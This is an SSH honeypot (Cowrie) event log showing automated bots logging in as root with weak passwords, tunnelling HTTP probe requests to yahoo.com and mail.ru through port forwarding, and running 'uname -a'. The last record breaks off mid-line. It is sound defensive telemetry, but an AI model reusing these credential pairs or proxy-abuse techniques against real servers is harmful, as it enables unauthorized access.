{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.091003Z","src_ip":"77.83.207.83","session":"32b88cdf1d0c"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.163436Z","src_ip":"212.227.235.229","session":"15cbaeaf80b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.230482Z","session":"0f5fd33200cc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":3263,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:3263","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.232412Z","session":"32b88cdf1d0c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.282737Z","src_ip":"77.83.207.83","session":"32b88cdf1d0c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.333779Z","src_ip":"77.83.207.83","session":"32b88cdf1d0c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36429,"dst_ip":"1.2.3.4","dst_port":22,"session":"be475f6f87b0","protocol":"ssh","message":"New connection: 77.83.207.83:36429 (1.2.3.4:22) [session: be475f6f87b0]","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.382376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.391345Z","src_ip":"77.83.207.83","session":"be475f6f87b0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.432314Z","src_ip":"77.83.207.83","session":"be475f6f87b0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.680733Z","src_ip":"77.83.207.83","session":"be475f6f87b0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11771,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11771","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.731690Z","session":"be475f6f87b0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.781495Z","src_ip":"77.83.207.83","session":"be475f6f87b0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":5097,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:5097","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.924330Z","session":"be475f6f87b0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:47.974418Z","src_ip":"77.83.207.83","session":"be475f6f87b0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":3947,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:3947","sensor":"my-vps","timestamp":"2025-08-31T03:43:48.116098Z","session":"be475f6f87b0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:48.165954Z","src_ip":"77.83.207.83","session":"be475f6f87b0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:48.216817Z","src_ip":"77.83.207.83","session":"be475f6f87b0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36492,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a53934c2ca4","protocol":"ssh","message":"New connection: 77.83.207.83:36492 (1.2.3.4:22) [session: 8a53934c2ca4]","sensor":"my-vps","timestamp":"2025-08-31T03:43:48.266410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:48.267400Z","src_ip":"77.83.207.83","session":"8a53934c2ca4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:48.317795Z","src_ip":"77.83.207.83","session":"8a53934c2ca4"}
{"eventid":"cowrie.login.success","username":"root","password":"larah0209","message":"login attempt [root/larah0209] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:48.341332Z","src_ip":"201.148.180.50","session":"756991504bd9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:48.567942Z","src_ip":"77.83.207.83","session":"8a53934c2ca4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":30356,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:30356","sensor":"my-vps","timestamp":"2025-08-31T03:43:48.619863Z","session":"8a53934c2ca4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:48.670074Z","src_ip":"77.83.207.83","session":"8a53934c2ca4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24556,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:24556","sensor":"my-vps","timestamp":"2025-08-31T03:43:48.812664Z","session":"8a53934c2ca4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:48.862830Z","src_ip":"77.83.207.83","session":"8a53934c2ca4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":17585,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:17585","sensor":"my-vps","timestamp":"2025-08-31T03:43:49.004447Z","session":"8a53934c2ca4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:49.054937Z","src_ip":"77.83.207.83","session":"8a53934c2ca4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:49.106191Z","src_ip":"77.83.207.83","session":"8a53934c2ca4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36559,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bc121ad3bb3","protocol":"ssh","message":"New connection: 77.83.207.83:36559 (1.2.3.4:22) [session: 6bc121ad3bb3]","sensor":"my-vps","timestamp":"2025-08-31T03:43:49.157187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:49.158112Z","src_ip":"77.83.207.83","session":"6bc121ad3bb3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:49.210479Z","src_ip":"77.83.207.83","session":"6bc121ad3bb3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:49.471282Z","src_ip":"77.83.207.83","session":"6bc121ad3bb3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10784,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10784","sensor":"my-vps","timestamp":"2025-08-31T03:43:49.524517Z","session":"6bc121ad3bb3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:49.576919Z","src_ip":"77.83.207.83","session":"6bc121ad3bb3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":12815,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:12815","sensor":"my-vps","timestamp":"2025-08-31T03:43:49.722800Z","session":"6bc121ad3bb3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:49.775154Z","src_ip":"77.83.207.83","session":"6bc121ad3bb3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":13670,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:13670","sensor":"my-vps","timestamp":"2025-08-31T03:43:49.922714Z","session":"6bc121ad3bb3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:49.975111Z","src_ip":"77.83.207.83","session":"6bc121ad3bb3"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.028517Z","src_ip":"77.83.207.83","session":"6bc121ad3bb3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36638,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9bf849ff60f","protocol":"ssh","message":"New connection: 77.83.207.83:36638 (1.2.3.4:22) [session: a9bf849ff60f]","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.079270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.080189Z","src_ip":"77.83.207.83","session":"a9bf849ff60f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.131369Z","src_ip":"77.83.207.83","session":"a9bf849ff60f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58480,"dst_ip":"1.2.3.4","dst_port":22,"session":"c60e4489ac0a","protocol":"ssh","message":"New connection: 212.227.235.229:58480 (1.2.3.4:22) [session: c60e4489ac0a]","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.205812Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.386255Z","src_ip":"77.83.207.83","session":"a9bf849ff60f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24365,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:24365","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.438292Z","session":"a9bf849ff60f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.489593Z","src_ip":"77.83.207.83","session":"a9bf849ff60f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:43:50.631584Z","src_ip":"201.148.180.50","session":"756991504bd9"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.632248Z","src_ip":"201.148.180.50","session":"756991504bd9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":13648,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:13648","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.633959Z","session":"a9bf849ff60f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.685158Z","src_ip":"77.83.207.83","session":"a9bf849ff60f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":9293,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:9293","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.829500Z","session":"a9bf849ff60f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.880648Z","src_ip":"77.83.207.83","session":"a9bf849ff60f"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.932688Z","src_ip":"77.83.207.83","session":"a9bf849ff60f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36715,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad02be6964b3","protocol":"ssh","message":"New connection: 77.83.207.83:36715 (1.2.3.4:22) [session: ad02be6964b3]","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.980859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:50.991251Z","src_ip":"77.83.207.83","session":"ad02be6964b3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":[